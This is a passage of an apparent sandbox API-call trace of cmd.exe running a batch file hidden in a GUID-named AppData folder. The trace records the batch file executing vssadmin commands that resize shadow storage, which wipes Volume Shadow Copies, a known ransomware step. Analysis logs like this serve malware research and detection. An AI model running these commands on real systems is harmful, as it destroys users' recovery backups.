lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x16be, lpOverlapped=0x0) returned 1 [0036.037] SetFilePointer (in: hFile=0x78, lDistanceToMove=576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x240 [0036.037] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=61, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\ned\r\n") returned 61 [0036.037] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.037] GetFileType (hFile=0x78) returned 0x1 [0036.037] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.037] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x240 [0036.037] GetProcessHeap () returned 0x3e0000 [0036.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0036.037] GetProcessHeap () returned 0x3e0000 [0036.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0036.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0036.037] GetProcessHeap () returned 0x3e0000 [0036.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0036.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x70) returned 0x3f8258 [0036.038] _tell (_FileHandle=3) returned 576 [0036.038] _close (_FileHandle=3) returned 0 [0036.038] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0036.038] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0036.038] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0036.038] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0036.038] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0036.038] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0036.038] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0036.038] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0036.038] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0036.038] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0036.038] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0036.038] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0036.038] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0036.038] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0036.038] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0036.038] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0036.038] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0036.038] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0036.038] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0036.038] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0036.038] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0036.039] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0036.039] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0036.039] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0036.039] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0036.039] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0036.039] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0036.039] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0036.039] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0036.039] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0036.039] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0036.039] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0036.039] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0036.039] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0036.039] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0036.039] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0036.039] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0036.039] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0036.039] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0036.039] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0036.039] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0036.039] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0036.039] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.039] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.039] SetErrorMode (uMode=0x0) returned 0x1 [0036.039] GetProcessHeap () returned 0x3e0000 [0036.039] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0036.039] GetProcessHeap () returned 0x3e0000 [0036.039] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0036.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.040] GetProcessHeap () returned 0x3e0000 [0036.040] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.040] GetProcessHeap () returned 0x3e0000 [0036.040] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.040] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.040] GetProcessHeap () returned 0x3e0000 [0036.040] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.040] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.040] GetProcessHeap () returned 0x3e0000 [0036.040] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0036.040] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0036.040] GetProcessHeap () returned 0x3e0000 [0036.040] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0036.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.040] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.040] GetLastError () returned 0x2 [0036.040] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.040] GetLastError () returned 0x2 [0036.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0036.040] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0036.041] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.041] GetLastError () returned 0x2 [0036.041] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0036.041] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0036.041] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.041] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.041] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.041] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0036.041] GetProcessHeap () returned 0x3e0000 [0036.041] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x82) returned 0x3f7250 [0036.041] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0036.041] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.041] SetErrorMode (uMode=0x0) returned 0x1 [0036.041] GetProcessHeap () returned 0x3e0000 [0036.041] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0036.041] GetProcessHeap () returned 0x3e0000 [0036.041] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0036.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.042] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.042] GetProcessHeap () returned 0x3e0000 [0036.042] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e0 [0036.042] GetProcessHeap () returned 0x3e0000 [0036.042] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7408 [0036.042] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7408, Size=0x122) returned 0x3f7408 [0036.042] GetProcessHeap () returned 0x3e0000 [0036.042] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7408) returned 0x122 [0036.042] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.042] GetProcessHeap () returned 0x3e0000 [0036.042] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7538 [0036.042] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7538, Size=0x76) returned 0x3f7538 [0036.042] GetProcessHeap () returned 0x3e0000 [0036.042] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7538) returned 0x76 [0036.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.042] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.042] GetLastError () returned 0x2 [0036.042] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.042] GetLastError () returned 0x2 [0036.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0036.042] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0036.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.043] GetLastError () returned 0x2 [0036.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0036.043] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0036.043] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.043] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.043] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.043] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0036.043] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0036.043] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0036.043] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.043] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.044] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.044] GetProcessHeap () returned 0x3e0000 [0036.044] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0036.044] GetProcessHeap () returned 0x3e0000 [0036.045] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0036.045] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.045] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xaa8, dwThreadId=0xaac)) returned 1 [0036.049] CloseHandle (hObject=0x78) returned 1 [0036.049] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.049] GetProcessHeap () returned 0x3e0000 [0036.049] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.049] GetEnvironmentStringsW () returned 0x3f8408* [0036.049] GetProcessHeap () returned 0x3e0000 [0036.049] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.049] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.049] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0036.161] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0036.161] CloseHandle (hObject=0x74) returned 1 [0036.161] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0036.162] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0036.162] GetProcessHeap () returned 0x3e0000 [0036.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.162] GetEnvironmentStringsW () returned 0x3f8408* [0036.162] GetProcessHeap () returned 0x3e0000 [0036.162] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.162] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.162] GetProcessHeap () returned 0x3e0000 [0036.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.162] GetEnvironmentStringsW () returned 0x3f8408* [0036.162] GetProcessHeap () returned 0x3e0000 [0036.162] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.162] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.162] GetProcessHeap () returned 0x3e0000 [0036.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0036.162] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0036.162] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.162] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.162] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.162] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.162] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.162] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.163] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.163] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.163] SetConsoleInputExeNameW () returned 0x1 [0036.163] GetConsoleOutputCP () returned 0x1b5 [0036.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.164] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0036.164] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.164] SetFilePointer (in: hFile=0x74, lDistanceToMove=576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x240 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7538 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7408 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e0 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8258 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0036.164] GetProcessHeap () returned 0x3e0000 [0036.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.164] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.164] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x240 [0036.165] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1681, lpOverlapped=0x0) returned 1 [0036.165] SetFilePointer (in: hFile=0x74, lDistanceToMove=641, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x281 [0036.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=65, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\n") returned 65 [0036.165] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.165] GetFileType (hFile=0x74) returned 0x1 [0036.165] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.165] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 